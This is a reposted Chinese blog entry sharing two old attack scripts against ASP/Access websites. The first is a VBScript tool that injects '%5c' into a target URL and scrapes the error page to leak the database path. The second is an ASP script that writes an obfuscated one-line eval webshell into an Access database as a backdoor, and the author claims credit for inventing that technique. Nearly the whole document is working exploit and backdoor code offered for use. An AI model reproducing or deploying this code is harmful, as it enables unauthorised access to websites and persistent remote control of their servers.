欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

N年前的两个脚本%5c暴库

程序员文章站 2022-04-29 09:14:02
dim xstatus,tstatus,vserver,vheader,vrsbody geterror=inputbox("请输入网站,例如:http://ww...
dim xstatus,tstatus,vserver,vheader,vrsbody
geterror=inputbox("请输入网站,例如:http://www.hackerxfiles.com/files/list.asp?id=415","请输入网址","http://www.hackerxfiles.com/files/list.asp?id=415")
if geterror = "" then
msgbox("输入错误,程序结束!")
wscript.quit
end if

geterror=strreverse(geterror)
tem2=0
for i=1 to len(geterror)
if mid(geterror,i,1) = chr(47) and tem2=0 then
temp=temp & "c5%"
tem2=tem2+1
else
temp=temp & mid(geterror,i,1)
end if
next
geterror=strreverse(temp)


call xmlpost(geterror)
errortext = vserver & " " & xstatus
basesaver = getstr(vrsbody,"找不到文件 '","'。</font>" & chr(10))
if basesaver="[none]" then
basesaver = getstr(vrsbody,"<font face="&chr(34)&"宋体"&chr(34)&" size=2>'","'不是一个有效的路径。")
end if
if basesaver="[none]" then
basesaver = getstr(vrsbody,"打开注册表关键字 '","'。</font>")
end if

if basesaver = "[none]" then
allreturn= "<title>mappath出错获取数据库地址 lilo</title><body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><b>" & errortext & "</b><br><br><textarea rows='15' name='s1' cols='57'>" &vrsbody& "</textarea>"
else
allreturn= "<title>mappath出错获取数据库地址 lilo</title><body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><b>" & errortext & "</b><br><br><textarea rows='15' name='s1' cols='57'>" &basesaver& "</textarea>"
end if

call openwin(allreturn)
set whshell = wscript.createobject("wscript.shell")
whshell.appactivate "mappath出错获取数据库地址 lilo"
'whshell.sendkeys ("%{tab}")
set whshell = nothing

function urlencoding(vstrin)
strreturn = ""
for i = 1 to len(vstrin)
thischr = mid(vstrin,i,1)
if abs(asc(thischr)) < &hff then
strreturn = strreturn & thischr
else
innercode = asc(thischr)
if innercode < 0 then
innercode = innercode + &h10000
end if
hight8 = (innercode and &hff00)\ &hff
low8 = innercode and &hff
strreturn = strreturn & "%" & hex(hight8) & "%" & hex(low8)
end if
next
urlencoding = strreturn
end function

function bytes2bstr(vin)
strreturn = ""
for i = 1 to lenb(vin)
thischarcode = ascb(midb(vin,i,1))
if thischarcode < &h80 then
strreturn = strreturn & chr(thischarcode)
else
nextcharcode = ascb(midb(vin,i+1,1))
strreturn = strreturn & chr(clng(thischarcode) * &h100 + cint(nextcharcode))
i = i + 1
end if
next
bytes2bstr = strreturn
end function

function xmlpost(iurl)
on error resume next
ipost=urlencoding(ipost)
set xpost = createobject("microsoft.xmlhttp")
xpost.open "post",iurl,false
xpost.send
xstatus = xpost.status
tstatus = xpost.statustext
vserver = xpost.getresponseheader("server")
vheader = xpost.getallresponseheaders
vrsbody = bytes2bstr(xpost.responsebody)
set xpost = nothing
end function

function getstr(vstring,istring,dstring)
vsum = instr(vrsbody,istring)
if vsum = 0 then getstr="[none]" : exit function
esum = instr(vsum,vrsbody,dstring)
if esum = 0 then getstr="[none]" : exit function
getstr = mid(vrsbody,vsum+len(istring),esum-vsum-len(istring))
end function

function inttostr(vnum,vlen)
if len(vnum) >= vlen then inttostr = vnum : exit function
for i=1 to vlen-len(vnum)
inttostr=inttostr & "0"
next
inttostr = inttostr & cstr(vnum)
end function

function getsplit(unstr,vastr,mode)
atemp = split(unstr,vastr)
btemp = ubound(atemp)
select case mode
case -1: getsplit = atemp
case -2: getsplit = btemp
end select
if mode < 0 then exit function
if mode > btemp then getsplit=false : exit function
if mode >= 0 then getsplit = atemp(mode)
end function

function openwin(vttv)
set ie = wscript.createobject("internetexplorer.application")
ie.navigate "about:blank"
ie.visible = 1 
ie.toolbar = 0
ie.statusbar = 0
ie.width=500
ie.height=335
do while (ie.busy): loop
set doc = ie.document
doc.open
execute "doc.writeln " & chr(34) & vttv & chr(34)
doc.close
set ie=nothing
end function

另一个是我写的,向access里插入asp代码来当作后门,这应当是我的首创了,不过我也不知其他人有没有更早提前发现的。后来网上就流传开直接向数据库插入一句话来得到webshell。不知不觉时光飞逝,4年过去了,人老了,难道只能怀旧吗?

<%

db="0123.asp" '这里改成您的数据库地址
set conn=server.createobject("adodb.connection")
connstr="provider=microsoft.jet.oledb.4.0;data source="&server.mappath(db)
conn.open connstr
'添加notdownload表
conn.execute("create table notdownload(notdown oleobject)")
'写入<%数据
set rs=server.createobject("adodb.recordset")
    sql="select * from notdownload"
rs.open sql,conn,1,3
rs.addnew
    rs("notdown").appendchunk(chrb(asc("<")) & chrb(asc("s")) & chrb(asc("c"))& chrb(asc("r")) & chrb(asc("i"))& chrb(asc("p"))& chrb(asc("t"))& chrb(asc(" "))& chrb(asc("r"))& chrb(asc("u"))& chrb(asc("n"))& chrb(asc("a"))& chrb(asc("t"))& chrb(asc("="))& chrb(asc("s"))& chrb(asc("e"))& chrb(asc("r"))& chrb(asc("v"))& chrb(asc("e"))& chrb(asc("r"))& chrb(asc(" "))& chrb(asc("l"))& chrb(asc("a"))& chrb(asc("n"))& chrb(asc("g"))& chrb(asc("u"))& chrb(asc("a"))& chrb(asc("g"))& chrb(asc("e"))& chrb(asc("="))& chrb(asc("j"))& chrb(asc("a"))& chrb(asc("v"))& chrb(asc("a"))& chrb(asc("s"))& chrb(asc("c"))& chrb(asc("r"))& chrb(asc("i"))& chrb(asc("p"))& chrb(asc("t"))& chrb(asc(">"))& chrb(asc("e"))& chrb(asc("v"))& chrb(asc("a"))& chrb(asc("l"))& chrb(asc("("))& chrb(asc("r"))& chrb(asc("e"))& chrb(asc("q"))& chrb(asc("u"))& chrb(asc("e"))& chrb(asc("s"))& chrb(asc("t"))& chrb(asc("."))& chrb(asc("f"))& chrb(asc("o"))& chrb(asc("r"))& chrb(asc("m"))& chrb(asc("("))& chrb(asc("'"))& chrb(asc("#"))& chrb(asc("'"))& chrb(asc(")"))& chrb(asc("+"))& chrb(asc("'"))& chrb(asc("'"))& chrb(asc(")"))& chrb(asc("<"))& chrb(asc("/"))& chrb(asc("s"))& chrb(asc("c"))& chrb(asc("r"))& chrb(asc("i"))& chrb(asc("p"))& chrb(asc("t"))& chrb(asc(">")))
    rs.update
    rs.close
set rs=nothing
'关闭连接
conn.close
set conn=nothing
%>